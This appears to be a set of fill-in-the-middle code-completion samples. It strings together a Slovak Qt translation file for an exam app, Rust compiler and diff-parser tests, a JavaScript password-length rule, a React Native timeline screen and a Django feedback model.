</message> <message> <source>Category names</source> <translation>Mená kategórií</translation> </message> <message> <source>Data</source> <translation>Dáta</translation> </message> <message> <source>Quit</source> <translation>Koniec</translation> </message> <message> <source>About</source> <translation>O programe</translation> </message> <message> <source>Your name:</source> <translation>Vaše meno:</translation> </message> <message> <source>When you are ready to begin the examination, click the Start button below.</source> <translation>Keď budete pripravení začať so skúškou, kliknite na tlačidlo Štart dole.</translation> </message> <message> <source>Start</source> <translation>Štart</translation> </message> <message> <source>Show remaining time</source> <translation>Zobraziť zostávajúci čas</translation> </message> <message> <source>minute(s)</source> <translation>minút(a)</translation> </message> <message> <source>Last question</source> <translation>Predchádzajúca otázka</translation> </message> <message> <source>Next question</source> <translation>Ďalšia otázka</translation> </message> <message> <source>Finish</source> <translation>Koniec</translation> </message> <message> <source>&lt;b&gt;Score:&lt;/b&gt;</source> <translation>&lt;b&gt;Skóre:&lt;/b&gt;</translation> </message> <message> <source>&lt;b&gt;Other settings&lt;/b&gt;</source> <translation>&lt;b&gt;Iné nastavenia&lt;/b&gt;</translation> </message> <message> <source>Hide question names, show numbers instead</source> <translation>Skryť mená otázok, zobraziť namiesto nich čísla</translation> </message> <message> <source>iTest off-line test sessions (*.itos);;All files (*.*)</source> <translation>iTest off-line testové sedenia (*.itos);;Všetky súbory (*.*)</translation> </message> <message> <source>%1 out of %2 (%3)</source> <translation>%1 z %2 (%3)</translation> </message> <message> <source>PASSED</source> <translation>UROBIL(A)</translation> </message> <message> <source>FAILED</source> <translation>NEUROBIL(A)</translation> </message> <message> <source>Total</source> <translation>Celkom</translation> </message> <message> <source>Pass mark</source> <translation>Dostatočná</translation> </message> <message> <source>New test</source> <translation>Nový test</translation> </message> <message> <source>iTestClient</source> <translation>iTestClient</translation> </message> <message> <source>iTestClient - Load test data</source> <translation>iTestClient - Načítať testové dáta</translation> </message> <message> <source>%1 of total %2</source> <translation>%1 z %2</translation> </message> <message> <source>Do not show correct answers at the end of the test</source> <translation>Nezobraziť na konci testu správne odpovede</translation> </message> <message> <source>LTR</source> <translation>LTR</translation> </message> <message> <source>Welcome!</source> <translation>Vitajte!</translation> </message> </context> <context> <name>QObject</name> <message> <source>a)</source> <translation>a)</translation> </message> <message> <source>b)</source> <translation>b)</translation> </message> <message> <source>c)</source> <translation>c)</translation> </message> <message> <source>d)</source> <translation>d)</translation> </message> <message> <source>e)</source> <translation>e)</translation> </message> <message> <source>f)</source> <translation>f)</translation> </message> <message> <source>g)</source> <translation>g)</translation> </message> <message> <source>h)</source> <translation>h)</translation> </message><|fim▁hole|> <message> <source>None</source> <translation>Žiadna</translation> </message> </context> <context> <name>QuestionWidget</name> <message> <source>%1 out of %2</source> <translation>%1 z %2</translation> </message> </context> </TS><|fim▁end|>
<message> <source>i)</source> <translation>i)</translation> </message>
<|file_name|>length.js<|end_file_name|><|fim▁begin|>var _ = require('underscore'); /* A rule should contain explain and rule methods */ // TODO explain explain // TODO explain missing // TODO explain assert function assert (options, password) { return !!password && options.minLength <= password.length; } function explain(options) { if (options.minLength === 1) { return { message: 'Non-empty password required', code: 'nonEmpty' }; } return { message: 'At least %d characters in length', format: [options.minLength], code: 'lengthAtLeast'<|fim▁hole|> module.exports = { validate: function (options) { if (!_.isObject(options)) { throw new Error('options should be an object'); } if (!_.isNumber(options.minLength) || _.isNaN(options.minLength)) { throw new Error('length expects minLength to be a non-zero number'); } return true; }, explain: explain, missing: function (options, password) { var explained = explain(options); explained.verified = !!assert(options, password); return explained; }, assert: assert };<|fim▁end|>
}; }
<|file_name|>inherent_impls.rs<|end_file_name|><|fim▁begin|>// This test case tests the incremental compilation hash (ICH) implementation // for let expressions. // The general pattern followed here is: Change one thing between rev1 and rev2 // and make sure that the hash has changed, then change nothing between rev2 and // rev3 and make sure that the hash has not changed. // build-pass (FIXME(62277): could be check-pass?) // revisions: cfail1 cfail2 cfail3 // compile-flags: -Z query-dep-graph -Zincremental-ignore-spans #![allow(warnings)] #![feature(rustc_attrs)] #![crate_type="rlib"] pub struct Foo; // Change Method Name ----------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn method_name() { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner,associated_item_def_ids")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail3")] pub fn method_name2() { } } // Change Method Body ----------------------------------------------------------- // // This should affect the method itself, but not the impl. #[cfg(cfail1)] impl Foo { pub fn method_body() { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner_nodes,optimized_mir,promoted_mir,typeck" )] #[rustc_clean(cfg="cfail3")] pub fn method_body() { println!("Hello, world!"); } } // Change Method Body (inlined) ------------------------------------------------ // // This should affect the method itself, but not the impl. #[cfg(cfail1)] impl Foo { #[inline] pub fn method_body_inlined() { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner_nodes,optimized_mir,promoted_mir,typeck" )] #[rustc_clean(cfg="cfail3")] #[inline] pub fn method_body_inlined() { println!("Hello, world!"); } } // Change Method Privacy ------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn method_privacy() { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2", except="associated_item,hir_owner,hir_owner_nodes")] #[rustc_clean(cfg="cfail3")] fn method_privacy() { } } // Change Method Selfness ----------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn method_selfness() { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,generics_of,typeck,associated_item,optimized_mir", )] #[rustc_clean(cfg="cfail3")] pub fn method_selfness(&self) { } } // Change Method Selfmutness --------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn method_selfmutness(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,typeck,optimized_mir" )] #[rustc_clean(cfg="cfail3")] pub fn method_selfmutness(&mut self) { } } // Add Method To Impl ---------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn add_method_to_impl1(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner,associated_item_def_ids")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] pub fn add_method_to_impl1(&self) { } #[rustc_clean(cfg="cfail3")] pub fn add_method_to_impl2(&self) { } } // Add Method Parameter -------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn add_method_parameter(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,typeck,optimized_mir" )] #[rustc_clean(cfg="cfail3")] pub fn add_method_parameter(&self, _: i32) { } } // Change Method Parameter Name ------------------------------------------------ #[cfg(cfail1)] impl Foo { pub fn change_method_parameter_name(&self, a: i64) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2", except="hir_owner_nodes,optimized_mir")] #[rustc_clean(cfg="cfail3")] pub fn change_method_parameter_name(&self, b: i64) { } } // Change Method Return Type --------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn change_method_return_type(&self) -> u16 { 0 } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,optimized_mir,typeck")] #[rustc_clean(cfg="cfail3")] pub fn change_method_return_type(&self) -> u8 { 0 } } // Make Method #[inline] ------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn make_method_inline(&self) -> u8 { 0 } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] #[inline] pub fn make_method_inline(&self) -> u8 { 0 } } // Change order of parameters ------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn change_method_parameter_order(&self, a: i64, b: i64) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2", except="hir_owner_nodes,optimized_mir")] #[rustc_clean(cfg="cfail3")] pub fn change_method_parameter_order(&self, b: i64, a: i64) { } } // Make method unsafe ---------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn make_method_unsafe(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,typeck,optimized_mir" )] #[rustc_clean(cfg="cfail3")] pub unsafe fn make_method_unsafe(&self) { } } // Make method extern ---------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn make_method_extern(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,typeck")] #[rustc_clean(cfg="cfail3")] pub extern "C" fn make_method_extern(&self) { } } // Change method calling convention -------------------------------------------- #[cfg(cfail1)] impl Foo { pub extern "C" fn change_method_calling_convention(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,typeck")] #[rustc_clean(cfg="cfail3")] pub extern "system" fn change_method_calling_convention(&self) { } } // Add Lifetime Parameter to Method -------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn add_lifetime_parameter_to_method(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { // Warning: Note that `typeck` are coming up clean here. // The addition or removal of lifetime parameters that don't // appear in the arguments or fn body in any way does not, in // fact, affect the `typeck` in any semantic way (at least // as of this writing). **However,** altering the order of // lowering **can** cause it appear to affect the `typeck`: // if we lower generics before the body, then the `HirId` for // things in the body will be affected. So if you start to see // `typeck` appear dirty, that might be the cause. -nmatsakis #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig")] #[rustc_clean(cfg="cfail3")] pub fn add_lifetime_parameter_to_method<'a>(&self) { } } // Add Type Parameter To Method ------------------------------------------------ #[cfg(cfail1)] impl Foo { pub fn add_type_parameter_to_method(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { // Warning: Note that `typeck` are coming up clean here. // The addition or removal of type parameters that don't appear in // the arguments or fn body in any way does not, in fact, affect // the `typeck` in any semantic way (at least as of this // writing). **However,** altering the order of lowering **can** // cause it appear to affect the `typeck`: if we lower // generics before the body, then the `HirId` for things in the // body will be affected. So if you start to see `typeck` // appear dirty, that might be the cause. -nmatsakis #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,generics_of,predicates_of,type_of", )] #[rustc_clean(cfg="cfail3")] pub fn add_type_parameter_to_method<T>(&self) { } } // Add Lifetime Bound to Lifetime Parameter of Method -------------------------- #[cfg(cfail1)] impl Foo { pub fn add_lifetime_bound_to_lifetime_param_of_method<'a, 'b>(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,generics_of,predicates_of,type_of,fn_sig" )] #[rustc_clean(cfg="cfail3")] pub fn add_lifetime_bound_to_lifetime_param_of_method<'a, 'b: 'a>(&self) { } } // Add Lifetime Bound to Type Parameter of Method ------------------------------ #[cfg(cfail1)] impl Foo { pub fn add_lifetime_bound_to_type_param_of_method<'a, T>(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { // Warning: Note that `typeck` are coming up clean here. // The addition or removal of bounds that don't appear in the // arguments or fn body in any way does not, in fact, affect the // `typeck` in any semantic way (at least as of this // writing). **However,** altering the order of lowering **can** // cause it appear to affect the `typeck`: if we lower // generics before the body, then the `HirId` for things in the // body will be affected. So if you start to see `typeck` // appear dirty, that might be the cause. -nmatsakis #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,generics_of,predicates_of,\ type_of,fn_sig")] #[rustc_clean(cfg="cfail3")] pub fn add_lifetime_bound_to_type_param_of_method<'a, T: 'a>(&self) { } } // Add Trait Bound to Type Parameter of Method ------------------------------ #[cfg(cfail1)] impl Foo { pub fn add_trait_bound_to_type_param_of_method<T>(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { // Warning: Note that `typeck` are coming up clean here. // The addition or removal of bounds that don't appear in the // arguments or fn body in any way does not, in fact, affect the // `typeck` in any semantic way (at least as of this // writing). **However,** altering the order of lowering **can** // cause it appear to affect the `typeck`: if we lower // generics before the body, then the `HirId` for things in the // body will be affected. So if you start to see `typeck` // appear dirty, that might be the cause. -nmatsakis #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,predicates_of")] #[rustc_clean(cfg="cfail3")] pub fn add_trait_bound_to_type_param_of_method<T: Clone>(&self) { } } // Add #[no_mangle] to Method -------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn add_no_mangle_to_method(&self) { }<|fim▁hole|>#[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] #[no_mangle] pub fn add_no_mangle_to_method(&self) { } } struct Bar<T>(T); // Add Type Parameter To Impl -------------------------------------------------- #[cfg(cfail1)] impl Bar<u32> { pub fn add_type_parameter_to_impl(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,generics_of")] #[rustc_clean(cfg="cfail3")] impl<T> Bar<T> { #[rustc_clean( cfg="cfail2", except="generics_of,fn_sig,typeck,type_of,optimized_mir" )] #[rustc_clean(cfg="cfail3")] pub fn add_type_parameter_to_impl(&self) { } } // Change Self Type of Impl ---------------------------------------------------- #[cfg(cfail1)] impl Bar<u32> { pub fn change_impl_self_type(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner")] #[rustc_clean(cfg="cfail3")] impl Bar<u64> { #[rustc_clean(cfg="cfail2", except="fn_sig,optimized_mir,typeck")] #[rustc_clean(cfg="cfail3")] pub fn change_impl_self_type(&self) { } } // Add Lifetime Bound to Impl -------------------------------------------------- #[cfg(cfail1)] impl<T> Bar<T> { pub fn add_lifetime_bound_to_impl_parameter(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes")] #[rustc_clean(cfg="cfail3")] impl<T: 'static> Bar<T> { #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] pub fn add_lifetime_bound_to_impl_parameter(&self) { } } // Add Trait Bound to Impl Parameter ------------------------------------------- #[cfg(cfail1)] impl<T> Bar<T> { pub fn add_trait_bound_to_impl_parameter(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes")] #[rustc_clean(cfg="cfail3")] impl<T: Clone> Bar<T> { #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] pub fn add_trait_bound_to_impl_parameter(&self) { } } // Force instantiation of some fns so we can check their hash. pub fn instantiation_root() { Foo::method_privacy(); #[cfg(cfail1)] { Bar(0u32).change_impl_self_type(); } #[cfg(not(cfail1))] { Bar(0u64).change_impl_self_type(); } }<|fim▁end|>
} #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")]
<|file_name|>explicit-self.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. #[feature(managed_boxes)]; static tau: f64 = 2.0*3.14159265358979323; struct Point {x: f64, y: f64} struct Size {w: f64, h: f64} enum shape { circle(Point, f64), rectangle(Point, Size) } fn compute_area(shape: &shape) -> f64 { match *shape { circle(_, radius) => 0.5 * tau * radius * radius, rectangle(_, ref size) => size.w * size.h } } impl shape { // self is in the implicit self region pub fn select<'r, T>(&self, threshold: f64, a: &'r T, b: &'r T) -> &'r T { if compute_area(self) > threshold {a} else {b} } } fn select_based_on_unit_circle<'r, T>( threshold: f64, a: &'r T, b: &'r T) -> &'r T { let shape = &circle(Point{x: 0.0, y: 0.0}, 1.0); shape.select(threshold, a, b) } #[deriving(Clone)] struct thing { x: A }<|fim▁hole|> #[deriving(Clone)] struct A { a: @int } fn thing(x: A) -> thing { thing { x: x } } impl thing { pub fn foo(@self) -> int { *self.x.a } pub fn bar(~self) -> int { *self.x.a } pub fn quux(&self) -> int { *self.x.a } pub fn baz<'a>(&'a self) -> &'a A { &self.x } pub fn spam(self) -> int { *self.x.a } } trait Nus { fn f(&self); } impl Nus for thing { fn f(&self) {} } pub fn main() { let x = @thing(A {a: @10}); assert_eq!(x.foo(), 10); assert_eq!(x.quux(), 10); let y = ~thing(A {a: @10}); assert_eq!(y.clone().bar(), 10); assert_eq!(y.quux(), 10); let z = thing(A {a: @11}); assert_eq!(z.spam(), 11); }<|fim▁end|>
<|file_name|>main.rs<|end_file_name|><|fim▁begin|><|fim▁hole|>fn main() { let config = ConfigBuilder::new() .with_width(150) .with_title("Rust is awesome".to_string()) .finalize(); println!("{}", config); let config = ConfigBuilder::new() .with_width(1000) .with_height(750) .with_minimized(true) .finalize(); println!("{}", config); }<|fim▁end|>
extern crate config; use config::ConfigBuilder;
<|file_name|>long.rs<|end_file_name|><|fim▁begin|><|fim▁hole|>use std::{fs, io, time::Instant}; extern crate svgbob; fn main() -> io::Result<()> { let art = include_str!("../test_data/long.bob"); let t1 = Instant::now(); fs::create_dir_all("out")?; fs::write("out/long.svg", svgbob::to_svg(art))?; println!("took {}ms", t1.elapsed().as_millis()); Ok(()) }<|fim▁end|>
<|file_name|>test_patchset.rs<|end_file_name|><|fim▁begin|>extern crate unidiff; use unidiff::PatchSet; #[test] fn test_parse_sample0_diff() { let buf = include_str!("fixtures/sample0.diff"); <|fim▁hole|> let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); // three file in the patch assert_eq!(3, patch.len()); // three hunks assert_eq!(3, patch[0].len()); // first file is modified assert!(patch[0].is_modified_file()); assert!(!patch[0].is_added_file()); assert!(!patch[0].is_removed_file()); // Hunk 1: five additions, no deletions, a section header assert_eq!(6, patch[0][0].added()); assert_eq!(0, patch[0][0].removed()); assert_eq!("Section Header", &patch[0][0].section_header); // Hunk 2: 2 additions, 8 deletions, no section header assert_eq!(2, patch[0][1].added()); assert_eq!(8, patch[0][1].removed()); assert_eq!("", &patch[0][1].section_header); // Hunk 3: four additions, no deletions, no section header assert_eq!(4, patch[0][2].added()); assert_eq!(0, patch[0][2].removed()); assert_eq!("", &patch[0][2].section_header); // Check file totals assert_eq!(12, patch[0].added()); assert_eq!(8, patch[0].removed()); // second file is added assert!(!patch[1].is_modified_file()); assert!(patch[1].is_added_file()); assert!(!patch[1].is_removed_file()); // third file is removed assert!(!patch[2].is_modified_file()); assert!(!patch[2].is_added_file()); assert!(patch[2].is_removed_file()); } #[test] fn test_parse_git_diff() { let buf = include_str!("fixtures/git.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(3, patch.len()); let added_files = patch.added_files(); assert_eq!(1, added_files.len()); assert_eq!("added_file", added_files[0].path()); assert_eq!(4, added_files[0].added()); assert_eq!(0, added_files[0].removed()); let removed_files = patch.removed_files(); assert_eq!(1, removed_files.len()); assert_eq!("removed_file", removed_files[0].path()); assert_eq!(0, removed_files[0].added()); assert_eq!(3, removed_files[0].removed()); let modified_files = patch.modified_files(); assert_eq!(1, modified_files.len()); assert_eq!("modified_file", modified_files[0].path()); assert_eq!(3, modified_files[0].added()); assert_eq!(1, modified_files[0].removed()); } #[test] fn test_parse_bzr_diff() { let buf = include_str!("fixtures/bzr.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(3, patch.len()); let added_files = patch.added_files(); assert_eq!(1, added_files.len()); assert_eq!("added_file", added_files[0].path()); assert_eq!(4, added_files[0].added()); assert_eq!(0, added_files[0].removed()); let removed_files = patch.removed_files(); assert_eq!(1, removed_files.len()); assert_eq!("removed_file", removed_files[0].path()); assert_eq!(0, removed_files[0].added()); assert_eq!(3, removed_files[0].removed()); let modified_files = patch.modified_files(); assert_eq!(1, modified_files.len()); assert_eq!("modified_file", modified_files[0].path()); assert_eq!(3, modified_files[0].added()); assert_eq!(1, modified_files[0].removed()); } #[test] fn test_parse_hg_diff() { let buf = include_str!("fixtures/hg.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(3, patch.len()); let added_files = patch.added_files(); assert_eq!(1, added_files.len()); assert_eq!("added_file", added_files[0].path()); assert_eq!(4, added_files[0].added()); assert_eq!(0, added_files[0].removed()); let removed_files = patch.removed_files(); assert_eq!(1, removed_files.len()); assert_eq!("removed_file", removed_files[0].path()); assert_eq!(0, removed_files[0].added()); assert_eq!(3, removed_files[0].removed()); let modified_files = patch.modified_files(); assert_eq!(1, modified_files.len()); assert_eq!("modified_file", modified_files[0].path()); assert_eq!(3, modified_files[0].added()); assert_eq!(1, modified_files[0].removed()); } #[test] fn test_parse_svn_diff() { let buf = include_str!("fixtures/svn.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(3, patch.len()); let added_files = patch.added_files(); assert_eq!(1, added_files.len()); assert_eq!("added_file", added_files[0].path()); assert_eq!(4, added_files[0].added()); assert_eq!(0, added_files[0].removed()); let removed_files = patch.removed_files(); assert_eq!(1, removed_files.len()); assert_eq!("removed_file", removed_files[0].path()); assert_eq!(0, removed_files[0].added()); assert_eq!(3, removed_files[0].removed()); let modified_files = patch.modified_files(); assert_eq!(1, modified_files.len()); assert_eq!("modified_file", modified_files[0].path()); assert_eq!(3, modified_files[0].added()); assert_eq!(1, modified_files[0].removed()); } #[test] fn test_parse_line_numbers() { let buf = include_str!("fixtures/sample0.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); let mut target_line_nos = vec![]; let mut source_line_nos = vec![]; let mut diff_line_nos = vec![]; for diff_file in patch { for hunk in diff_file { for line in hunk { source_line_nos.push(line.source_line_no.clone()); target_line_nos.push(line.target_line_no.clone()); diff_line_nos.push(line.diff_line_no); } } } let expected_target_line_nos = vec![ // File: 1, Hunk: 1 Some(1), Some(2), Some(3), Some(4), Some(5), Some(6), Some(7), Some(8), Some(9), // File: 1, Hunk: 2 Some(11), Some(12), Some(13), None, None, None, None, None, None, None, Some(14), Some(15), Some(16), None, Some(17), Some(18), Some(19), Some(20), // File: 1, Hunk: 3 Some(22), Some(23), Some(24), Some(25), Some(26), Some(27), Some(28), // File: 2, Hunk 1 Some(1), Some(2), Some(3), Some(4), Some(5), Some(6), Some(7), Some(8), Some(9), // File: 3, Hunk 1 None, None, None, None, None, None, None, None, None, ]; let expected_source_line_nos = vec![ // File: 1, Hunk: 1 None, None, None, None, None, None, Some(1), Some(2), Some(3), // File: 1, Hunk: 2 Some(5), Some(6), Some(7), Some(8), Some(9), Some(10), Some(11), Some(12), Some(13), Some(14), None, Some(15), Some(16), Some(17), None, Some(18), Some(19), Some(20), // File: 1, Hunk: 3 Some(22), Some(23), Some(24), None, None, None, None, // File: 2, Hunk 1 None, None, None, None, None, None, None, None, None, // File: 3, Hunk 1 Some(1), Some(2), Some(3), Some(4), Some(5), Some(6), Some(7), Some(8), Some(9), ]; let expected_diff_line_nos = vec![ // File: 1, Hunk: 1 4, 5, 6, 7, 8, 9, 10, 11, 12, // File: 1, Hunk: 2 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, // File: 1, Hunk: 3 33, 34, 35, 36, 37, 38, 39, // File: 2, Hunk 1 43, 44, 45, 46, 47, 48, 49, 50, 51, // File: 3, Hunk 1 55, 56, 57, 58, 59, 60, 61, 62, 63, ]; assert_eq!(expected_source_line_nos, source_line_nos); assert_eq!(expected_target_line_nos, target_line_nos); assert_eq!(expected_diff_line_nos, diff_line_nos); } #[cfg(feature = "encoding")] #[test] fn test_parse_from_encoding() { let buf = include_bytes!("fixtures/sample3.diff"); let mut patch = PatchSet::from_encoding("utf-8"); patch.parse_bytes(buf).unwrap(); assert_eq!(3, patch.len()); assert_eq!("holá mundo!", patch[0][0][1].value); } #[test] fn test_single_line_diff() { { let buf = include_str!("fixtures/sample4.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(1, patch.len()); let added_files = patch.added_files(); assert_eq!(1, added_files.len()); assert_eq!("sample.txt", added_files[0].path()); assert_eq!(1, added_files[0].added()); assert_eq!(0, added_files[0].removed()); } { let buf = include_str!("fixtures/sample5.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(1, patch.len()); let removed_files = patch.removed_files(); assert_eq!(1, removed_files.len()); assert_eq!("sample.txt", removed_files[0].path()); assert_eq!(0, removed_files[0].added()); assert_eq!(1, removed_files[0].removed()); } } #[test] fn test_single_line_diff_with_trailer() { let buf = include_str!("fixtures/sample4-plus.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(3, patch.len()); let added_files = patch.added_files(); assert_eq!(3, added_files.len()); assert_eq!("sample.txt", added_files[0].path()); assert_eq!(1, added_files[0].added()); assert_eq!(0, added_files[0].removed()); assert_eq!("sample2.txt", added_files[1].path()); assert_eq!(1, added_files[1].added()); assert_eq!(0, added_files[1].removed()); assert_eq!("sample3.txt", added_files[2].path()); assert_eq!(1, added_files[2].added()); assert_eq!(0, added_files[2].removed()); } #[test] fn test_parse_patchset_from_str() { let buf = include_str!("fixtures/sample0.diff"); let patch: PatchSet = buf.parse().unwrap(); // three file in the patch assert_eq!(3, patch.len()); // three hunks assert_eq!(3, patch[0].len()); }<|fim▁end|>
<|file_name|>LookAround.js<|end_file_name|><|fim▁begin|>/** * Created by shuis on 2017/5/29. */ import React, { Component } from 'react'; import { View, Image, FlatList, TouchableWithoutFeedback } from 'react-native'; import {TabBarIcon, TweetSeparator} from '../component/base'; import Tweet from '../component/Tweet'; import {public_timeline} from '../api/api'; class LookAround extends Component{ static navigationOptions = ({ navigation }) => ({ title: '随便看看', tabBarLabel: '发现', tabBarIcon: <TabBarIcon icon={require('../img/discovery.png')}/>, headerRight: ( <TouchableWithoutFeedback onPress={()=>{navigation.state.params.onPress()}}> <View style={{padding:10}}> <Image source={require('../img/refresh.png')}/> </View> </TouchableWithoutFeedback> ) }); constructor(props){ super(props); this.state = { data: [], showImageViewer: false, image: [{url:''}], } } componentWillMount() { this.props.navigation.setParams({ onPress:this._fetch, }) } componentDidMount() { this._fetch(); } _fetch = async () => { try { let res = await public_timeline(); this.setState({ data: res, }); } catch (e) { } }; _renderItem = ({item}) => { return <Tweet item={item} navigation={this.props.navigation}/>; }; _keyExtractor = (item, index) => index; _renderSeparator = () => { return <TweetSeparator/> }; render(){ return ( <View> <FlatList data = {this.state.data} renderItem = {this._renderItem} initialNumToRender = {6} keyExtractor={this._keyExtractor} ItemSeparatorComponent={this._renderSeparator} /> </View> ) } }<|fim▁hole|>export default LookAround;<|fim▁end|>
<|file_name|>models.py<|end_file_name|><|fim▁begin|>"""Models for the ``feedback_form`` app.""" from django.contrib.contenttypes.fields import GenericForeignKey from django.contrib.contenttypes.models import ContentType from django.db import models from django.conf import settings from django.utils.encoding import python_2_unicode_compatible from django.utils.translation import ugettext_lazy as _ @python_2_unicode_compatible class Feedback(models.Model): """ Holds information about one user feedback. :user: User account of the poster, if logged in. :email: Email field, if user isn't logged in and wants to send her email. :current_url: URL of the current page. :message: Feedback text. :creation_date: Datetime of the feedback creation. :content_object: Optional related object the feedback is referring to. """ user = models.ForeignKey( settings.AUTH_USER_MODEL, verbose_name=_('User'), related_name='feedback_form_submissions', blank=True, null=True, ) email = models.EmailField( verbose_name=_('Email'), blank=True, ) current_url = models.URLField( verbose_name=_('Current URL'), max_length=4000, blank=True, ) message = models.TextField( verbose_name=_('Message'), max_length=4000, ) creation_date = models.DateTimeField( auto_now_add=True, verbose_name=_('Creation Date'), ) # Generic FK to the object this feedback is about content_type = models.ForeignKey( ContentType, related_name='feedback_content_objects', null=True, blank=True, ) object_id = models.PositiveIntegerField(null=True, blank=True) content_object = GenericForeignKey('content_type', 'object_id') class Meta: ordering = ['-creation_date'] def __str__(self): if self.user: return '{0} - {1}'.format(self.creation_date, self.user) elif self.email: return '{0} - {1}'.format(self.creation_date, self.email)<|fim▁hole|><|fim▁end|>
return '{0}'.format(self.creation_date)
